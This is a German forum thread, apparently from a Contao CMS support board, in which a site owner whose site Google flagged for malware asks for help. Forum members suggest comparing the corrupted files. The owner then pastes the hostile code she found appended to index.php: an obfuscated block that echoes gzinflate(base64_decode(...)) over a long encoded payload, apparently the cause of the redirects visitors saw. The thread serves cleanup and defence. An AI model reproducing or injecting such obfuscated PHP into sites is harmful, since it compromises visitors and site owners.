Liste der Anhänge anzeigen (Anzahl: 1)
Google hat mir die WebSite gesperrt
Hallo Contaos,
nun habe ich endlich zwei Webprojekte so gut wie fertig (meine Ersten Contao-Works) und bin damit schon ziemlich zufrieden.
Dann kommt Google und legt mir Alles wieder lahm, weil mir unterstellt wird, Malware und Viren zu verbreiten.
Nach Absprache mit meinem Webhoster (www.webhoster.de) habe ich alle Installationsordner komplett vom Server auf den PC
heruntergeladen und mit AVIRA und MICROSOFT SECURITY ESSENTIALS überprüft: SAUBER!
Dann habe ich nochmal den Contao-Check gemacht, der VOR der Programmierung zu 100% GRÜN war, nun zeigt er mir folgendes Bild:
Anhang 7186
Mein Contao läuft in der aktuellen Version 2.11.2 auch mein FTP (File-Zilla) ist aktuell, Avira ist Tagesaktuell und M-Security Essentials sind auch Tagesaktuell.
Google findet im Verzeichnis NICHT den implementierten Code, sodass ich Google nicht mal bitten kann, die Site wieder freizugeben.
Ich bin ziemlich ratlos und frage auch hier, wie ich meine Verzeichnisse auf dem Server gegen Eindringlinge konsequent schützen kann.
Ich danke Euch für einfach verständliche Lösungsvorschläge.
LG Jeanette
Die Webprojekte: www.dielichtformer.de (von Google gesperrt) und www.ferienhausbelgien.eu (wieder frei)
Liste der Anhänge anzeigen (Anzahl: 1)
Ich bekomme da ebenfalls eine Warnung, die nicht gut ausschaut:Anhang 7187
Passt das von Dir eingesetzte Checktool zur hochgeladenen Contao-Version?
Sind die mit 'Corrupt' gekennzeichneten Dateien von Dir geändert worden?
Carolina.
(Meine Meinung zu Avira und MSSE ist, dass man da eigentlich auch Nimm2 lutschen kann.)
Liste der Anhänge anzeigen (Anzahl: 1)
Übrigens habe ich gerade die zweite Seite (FerienhausBelgien) aufgerufen; für einen kurzen Moment habe ich sie gesehen, dann kam ein Warnhinweis zu einer anderen URL. (Bei der anderen Seite kam die Meldung sofort.) Als würde eine "verseuchte" Seite eingebettet sein.
Zusatz: Es wäre nicht schlecht, wenn du die Dateien nicht einfach ersetzt, sondern uns zusätzlich eine Kopie der "verseuchten", rot markierten, Dateien anhängst. Dann kann man sich den Code mal angucken.
Ich habe die index.php in Dreamweaver - Quelltext verglichen
... und dieser Code wurde mir ab Zeile 141 drangehängt:
Zitat:
* Instantiate the controller
*/
$objIndex = new Index();
$objIndex->run();
#215d25#
echo(gzinflate(base64_decode("1VZLc5swEP4rLRcgjB1L IB5D1Et76blHjw/EhppMgm1Q6rE95rdXq5fxm2Z6aGdAMSvtft8+o6dmWpdL9mVGv 2UsT2e0ytefZo6bzulgmdVN/r1ijj1C2HYfSVoWzrqsZov1cLaYvr/lFXNZvdlxHWu1zq3hsl6wBdss8/00Y9O5s1qt3N12S+3s1U7h7y/b227TpqGWBcaQuyuoXdieXfN3wd83/n6d8yWr7bSgBf+CnRlfcjvd55TNy2ZcDJv354bVDkIuNzhJGbU 3fLuilj8kLbwEwTJqEWlR0gZJSwIuCGKQRrDAoSCBXwGXtBjz0 0YUtb4w4qvvk8MkBBSuAaIAtYGwCOp+rD6MBkdHsYBWFBKpJoR IGAAx5lBES0IwRZQnpx6R8BSCSwAFfuL4RDMELaQP+pK6JHYFp 1+sYokrSUUHV8MWJzeoIiIZwA6YwCYUBInI8ge84BiwCwvBikU ooYAD8BMUOBXJM9AwIIk0c2kAGQomTypu+kig0xZK4koozRFJT qdMIQurEKsIdg9+YF9m0xxGCgxpbOnpDQ3taNIpwU6gYmUrNCy 0xDf5ILIYBJYiKh6ZQ1klOmrGjnDFBBOOyaiA/fAQZJUOlXRpSzfKSLgWgztyI1JapCsVfvgjKJVOhi7VCz+Ewlu l3RUIdEk9iC/4g3o20eX2MyUi7IjJghPdXD1aJlAtI6RBN4Q3Z42eHzd6ykwSG aKRKNqwO8x0diPTs5DT6KR34+FJd8ryRP9Zg16KxFk74T/po6Mhdd5OMkw9EO93nEG633i9UY97szN2+pvodPFd/Y8U3flAPSq94wn5tyr9ymDuhfyh/5n/wv3CdJ94NCZX8nGnvgUxMA1z7urwtYbN8rVkjpW1lrmRuW5aLG qnpKO0/ExJHKWl57m7F1rCva9pvB+sLquf42LiDOYPDh4gDz1U45cJV9y LO+GKn4Lb4Xbr5o5leSs3fXpU99Tf")));
#/215d25#
?>
Wäre es richtig, wenn ich nun die betroffenen acht (rosa Zeilen aus dem Contao-Ceck) einfach wieder ersetze, damit dieser angehängte Code verschwindet?
Dann interessiert mich noch, wie ich mich vor Neu-Infizierungen schützen kann...?
Danke sehr für Eure kompetente Hilfe!